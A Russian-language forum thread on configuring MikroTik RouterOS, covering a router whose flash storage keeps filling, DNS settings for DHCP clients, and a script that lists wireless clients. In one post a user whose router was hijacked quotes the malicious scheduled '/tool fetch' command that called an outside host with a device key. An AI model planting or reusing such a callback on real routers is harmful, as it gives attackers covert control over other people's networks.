Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Компьютеры » В помощь системному администратору » MikroTik RouterOS (часть 4)

Модерирует : lynx, Crash_Master, dg, emx, ShriEkeR

 Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171

Открыть новую тему     Написать ответ в эту тему

evgeniy7676



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
 
MikroTik RouterOS (часть 1), MikroTik RouterOS (часть 2), MikroTik RouterOS (часть 3), MikroTik RouterOS (часть 4)
Официальный сайт: http://www.mikrotik.com
 
Данная тема создана для обмена информацией по вопросам и проблемам настройки MikroTik RouterOS
Тема в варезнике
 
 
актуальные версии RouterOS:
Current: 6.42.6 Bugfix only: 6.40.8 Legacy: 5.26

актуальная версия SwitchOS: 2.7
актуальная версия WinBox: 3.16

 
Mikrotik — Плюсы и минусы Подробнее...
Видео-экскурсия по заводу Mikrotik Ltd


FAQ по особенностям и тонкостям MikroTik RouterOS  Перейти



Официальная документация:
  • Англоязычный ОФИЦИАЛЬНЫЙ мануал
  • Алфавитный указатель
  • Официальные статьи пользователей RouterOS
  • для версии 3 http://www.mikrotik.com/testdocs/ros/3.0/
  • для версии 2.9 http://www.mikrotik.com/docs/ros/2.9/
  • RouterOS Packet Flow: http://wiki.mikrotik.com/wiki/Packet_Flow (важно знать для понимания сути происходящего в файрволе и шейпере)
  • Совместимое оборудование
  • Описание изменений в новых версиях RouterOS(+rc)
  • RouterBOOT changelog (изменения в boot-версиях загрузчика RouterOS)
  • Система управления пользователями встроенная в RouterOS (RADIUS server)
  • l7-protos.rsc (примеры L7-filter)


    Официальные ресурсы:
    Форум
    Демо-сайт с веб-интерфейсом системы №1        Подробнее...
    Демо-сайт с веб-интерфейсом системы №2        Подробнее...
    MikroTik User Meeting(Конференции пользователей Mikrotik)        Подробнее...
    "Хардварные решения"
    MikroTik News
    MikroTik related video service
    DESIGNS.MIKROTIK.COM - сервис для брендирования продукции Mikrotik.
    Twitter Mikrotik
    MikroTik Training (Хочешь на тренинг? Получить сертификат?)
    Предыдущие версии RouterOS Подробнее...    История релизов  Подробнее...
    Mikrotik Wireless Link Calculator


    Неофициальная русскоязычная документация    Перейти
    Обсуждение ROS(форумы)    Перейти
    Обзоры продуктов RouterBOARD    Перейти


    Русскоязычные блоги интернет-магазинов и блоггеров по настройке и тонкостям Mikrotik:  
     


     

     

     
       


     

     
         
     
     
         
     
     
         
     
     
     



    Смежные ресурсы    Перейти
     
    VPN + OSPF в картинках.
    MikroTik Config Parser
    mikrotik.vetriks.ru

    // текущий бэкап шапки..

  • Всего записей: 120 | Зарегистр. 19-03-2009 | Отправлено: 16:55 30-03-2016 | Исправлено: anton04, 15:21 12-07-2018
    EshmER



    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    Chupaka
    Выключил web proxi очистил логи, выключил снифер, очистил логи, удалил все радиус подключения и pptp профили, почистил все логи, перезагрузил, и всеравно места нет 16 из 16.
    потом ребутнул ещё раз. и сразу загрузился, заметил что места было  12 мб и буквально за 30 сек оно увеличилось по пол мегабита обратно до 16.. мистика во как

    Всего записей: 26 | Зарегистр. 29-06-2010 | Отправлено: 17:01 09-07-2018
    HERSOFT

    Junior Member
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    HERSOFT Вернул доступ спсиб  

    Вернул так, как я тебе сказал ? Пароль был сменен ? В сети много видел "чудаков" ? )))

    Всего записей: 42 | Зарегистр. 12-07-2008 | Отправлено: 17:22 09-07-2018
    EshmER



    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    HERSOFT
    я сеть не смотрел, именно свой ip с маской проверял, да пароль был поменян и куча всего интересного включена
     
    Помимо настрое сидел ещё скрипт на выполнении
     

    Цитата:
    {/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=624B92C22A798292809624C048967F8E&dynamic=static")  keep-result=no}

    Всего записей: 26 | Зарегистр. 29-06-2010 | Отправлено: 17:24 09-07-2018 | Исправлено: EshmER, 17:26 09-07-2018
    Kventin333

    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    Дублирую вопрос и добавляю информации
     
    MikroTik RouterOS 6.42.5  
     
    После MikroTik стоят  WiFI  точки доступа TP-Link ,  если у тебе относительно новый смартфон, то ты подключаешься и у тебя есть инет. Если допустим подключаешься с смартфона 2014 года выпуска или с ноутбука, то тебе только дает IP, но интернета нет. В чем может быть трабл?
     
    Добавляю трассировку
     
           
     
     
     
     
     
    Добавлено:
    Смена режимов точки доступа не помогла
     

    Всего записей: 8 | Зарегистр. 17-01-2017 | Отправлено: 17:25 09-07-2018 | Исправлено: Kventin333, 17:37 09-07-2018
    Chupaka



    Silver Member
    Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
    Kventin333
    DNS телефон получает нормально? А если прописать вручную?
     
    EshmER
    Вы вопрос видели? В самом File List пусто-то? Или мне надо угадать, что если вы его игнорируете - то пусто?
     

    Цитата:
    места было  12 мб и буквально за 30 сек оно увеличилось по пол мегабита обратно до 16..

    А сетевой трафик был при этом? Может, он завирусован чем-то и скачивает себе что-то

    Всего записей: 3345 | Зарегистр. 05-05-2006 | Отправлено: 17:37 09-07-2018
    EshmER



    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    EshmER  
    Вы вопрос видели? В самом File List пусто-то?  Или мне надо угадать, что если вы его игнорируете - то пусто?  
     
     
    Цитата:
    места было  12 мб и буквально за 30 сек оно увеличилось по пол мегабита обратно до 16..
     
    А сетевой трафик был при этом? Может, он завирусован чем-то и скачивает себе что-то  

    В самом листе все удалил. перзагрузился ещё много раз отключая свякую фигню. и всеравно ниже 9,5 из 16 не опуститься, а там system-6.42.5-mipsbe.npk только весит 7,2 MB

    Всего записей: 26 | Зарегистр. 29-06-2010 | Отправлено: 17:55 09-07-2018
    Chupaka



    Silver Member
    Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
    EshmER

    Цитата:
    В самом листе все удалил

    А что было-то? Если вы ещё не поняли, телепатов тут всё ещё нет.
     
    И нафига вы цитируете то, на что не собираетесь отвечать?
     
    В общем, чую, https://wiki.mikrotik.com/wiki/Manual:Netinstall в помощь - ему свободное место не надо

    Всего записей: 3345 | Зарегистр. 05-05-2006 | Отправлено: 18:08 09-07-2018
    Kventin333

    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    Chupaka
    Я буду там на этой неделе снова попробую посмотреть. Может действительно дело в DNS, но там много народу подключается отдыхающих (где то человек под 100)  , всем не пропишешь эти настройки вручную. Как сделать так чтобы MikroTik  автоматически присваивал настройки DNS?

    Всего записей: 8 | Зарегистр. 17-01-2017 | Отправлено: 18:16 09-07-2018
    alexnov66



    Full Member
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    EshmER
    Битых блоков сколько показывает и они постоянны или увеличиваются.

    Цитата:
    и всеравно ниже 9,5 из 16 не опуститься

    для начала закиньте основные пакеты, потом доустановите остальные.

    Цитата:
    так как несколько устройств RouterBOARD 941-2nD

    железка максимум для дома, раздавать трафик, а тем более строить на ней тунели не годится, скупой платит дважды.

    Всего записей: 523 | Зарегистр. 29-08-2005 | Отправлено: 18:28 09-07-2018 | Исправлено: alexnov66, 18:41 09-07-2018
    Kventin333

    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    Я зашел через удаленный доступ (winbox) на Mikrotik
     
       
     
    Я так понимаю мне надо вписать в первое поле 8.8.8.8 ,я правильно предполагаю или еще что то?

    Всего записей: 8 | Зарегистр. 17-01-2017 | Отправлено: 18:50 09-07-2018
    alexnov66



    Full Member
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    Kventin333
    Естественно должен быть прописан dns сервер если он не получается автоматически от провайдера(второе поле), да и дополнительно то же можно прописать.
    И уменьшите размер udp пакета до 512

    Всего записей: 523 | Зарегистр. 29-08-2005 | Отправлено: 18:59 09-07-2018 | Исправлено: alexnov66, 19:00 09-07-2018
    HERSOFT

    Junior Member
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Как сделать так чтобы MikroTik  автоматически присваивал настройки DNS?  

    Надо в настойках самого DHCP прописать в DNS адрес микрота. А уже в настройках DNS можешь писать что хочешь. Хоть 8.8.8.8, хоть 1.1.1.1 (да, есть и такой DNS сервер)
    Вот как у меня с DNS AD Guard

    Всего записей: 42 | Зарегистр. 12-07-2008 | Отправлено: 20:09 09-07-2018 | Исправлено: HERSOFT, 20:14 09-07-2018
    Chupaka



    Silver Member
    Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
    Kventin333

    Цитата:
    Может действительно дело в DNS, но там много народу подключается отдыхающих (где то человек под 100)  , всем не пропишешь эти настройки вручную. Как сделать так чтобы MikroTik  автоматически присваивал настройки DNS?

    А что там за ТыПыЛинки? А то у домашних я не помню возможности настройки их в бридж, поэтому проверить бы ещё, что это именно Микротик раздаёт адреса, а не сами ТупоЛинки... Более того, у 740-х, кажется, наша техподдержка встречалась с глюком, что они не получали ДНС по ДХЦП, поэтому ДНС прописывали статикой на самих роутерах

    Всего записей: 3345 | Зарегистр. 05-05-2006 | Отправлено: 21:11 09-07-2018 | Исправлено: Chupaka, 21:12 09-07-2018
    Kventin333

    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    HERSOFT
    как на первой картинке, не могу у себя найти DHCP Network
    Chupaka
    Буду там, гляну, что там за Тополинки

    Всего записей: 8 | Зарегистр. 17-01-2017 | Отправлено: 22:05 09-07-2018
    alexnov66



    Full Member
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    Kventin333

    Цитата:
    не могу у себя найти DHCP Network

    там же где и dhcp сервер, если конечно dhcp пакет установлен.

    Всего записей: 523 | Зарегистр. 29-08-2005 | Отправлено: 01:23 10-07-2018 | Исправлено: alexnov66, 01:24 10-07-2018
    profvit

    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Вы, грубо говоря, для подсчёта числа коров считаете число копыт и делите на четыре. Сделайте проще:  

    Chupaka Спасибо!. Действительно так считает правильно. А вы случаем не знаете простого способа получения Мак адресов  и Uptime? Я пробовал наваять сам, но по при использовании  /interface wireless registration-table get number=$k mac-address  в цикле,  как и прошлый раз получаю мак адреса не всех клиентов.

    Всего записей: 3 | Зарегистр. 02-09-2009 | Отправлено: 09:04 10-07-2018
    HERSOFT

    Junior Member
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    как на первой картинке, не могу у себя найти DHCP Network  

    IP>DHCP Server Вкладка Networks
     
    В терминале винбокса дай комманду ip dns print и увидишь свои DNS сервера
     


    Всего записей: 42 | Зарегистр. 12-07-2008 | Отправлено: 10:17 10-07-2018
    Chupaka



    Silver Member
    Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
    profvit

    Цитата:
    А вы случаем не знаете простого способа получения Мак адресов  и Uptime?

    Знаю, конечно
     

    Код:
     
    /interface wireless registration-table
    :foreach i in=[find] do={
      :put "$[get $i mac-address] - $[get $i uptime]"
    }
     

     
    Грубо говоря, всё, где используется numbers= - это для ручного ввода из консоли и в скриптах использоваться не должно, ибо, как правило, работает не так, как того ожидают. В частности, эти числа зависят от предыдущего вызова print, например.

    Всего записей: 3345 | Зарегистр. 05-05-2006 | Отправлено: 11:50 10-07-2018 | Исправлено: Chupaka, 11:52 10-07-2018
    EshmER



    Newbie
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    alexnov66

    Цитата:
    EshmER  
    Битых блоков сколько показывает и они постоянны или увеличиваются.  

                       uptime: 15m10s
                      version: 6.34.2 (stable)
                   build-time: Feb/18/2016 06:31:18
                  free-memory: 4048.0KiB
                 total-memory: 32.0MiB
                          cpu: MIPS 24Kc V7.4
                    cpu-count: 1
                cpu-frequency: 650MHz
                     cpu-load: 21%
               free-hdd-space: 7.4MiB
              total-hdd-space: 16.0MiB
      write-sect-since-reboot: 143
             write-sect-total: 63780
                   bad-blocks: 0%
            architecture-name: smips
                   board-name: hAP lite
                     platform: MikroTik
     

    Цитата:
    для начала закиньте основные пакеты, потом доустановите остальные.  

     
    закидываю основной пакет system , он весит 7,1 загружается в файлы и исчезает.
     
     
    Ещё ребутает себя см последний день с формулировкой  
    "18:22:54 system,error,critical System rebooted because of kernel failure  
    18:22:54 system,error,critical Out of memory condition was detected  
    18:22:54 system,error,critical router was rebooted without proper shutdown  
    "
     

    Всего записей: 26 | Зарегистр. 29-06-2010 | Отправлено: 18:41 10-07-2018
    andreik99

    Full Member
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
    Подскажите пожалуйста новичку в миктротиках, где через WEB-морду или в Winbox можно посмотреть MAC и IP адреса а также имя  подключенных по LAN и Wi-FI устройств.

    Всего записей: 467 | Зарегистр. 19-06-2008 | Отправлено: 18:44 10-07-2018
    Открыть новую тему     Написать ответ в эту тему

    Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171

    Компьютерный форум Ru.Board » Компьютеры » В помощь системному администратору » MikroTik RouterOS (часть 4)

    Имя:
    Пароль:
    Сообщение

    Для вставки имени, кликните на нем.

    Опции сообщенияДобавить свою подпись
    Подписаться на получение ответов по e-mail
    Добавить тему в личные закладки
    Разрешить смайлики?
    Запретить коды


    Реклама на форуме Ru.Board.

    Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
    Modified by Ru.Board
    © Ru.Board 2000-2018

    BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

    Рейтинг.ru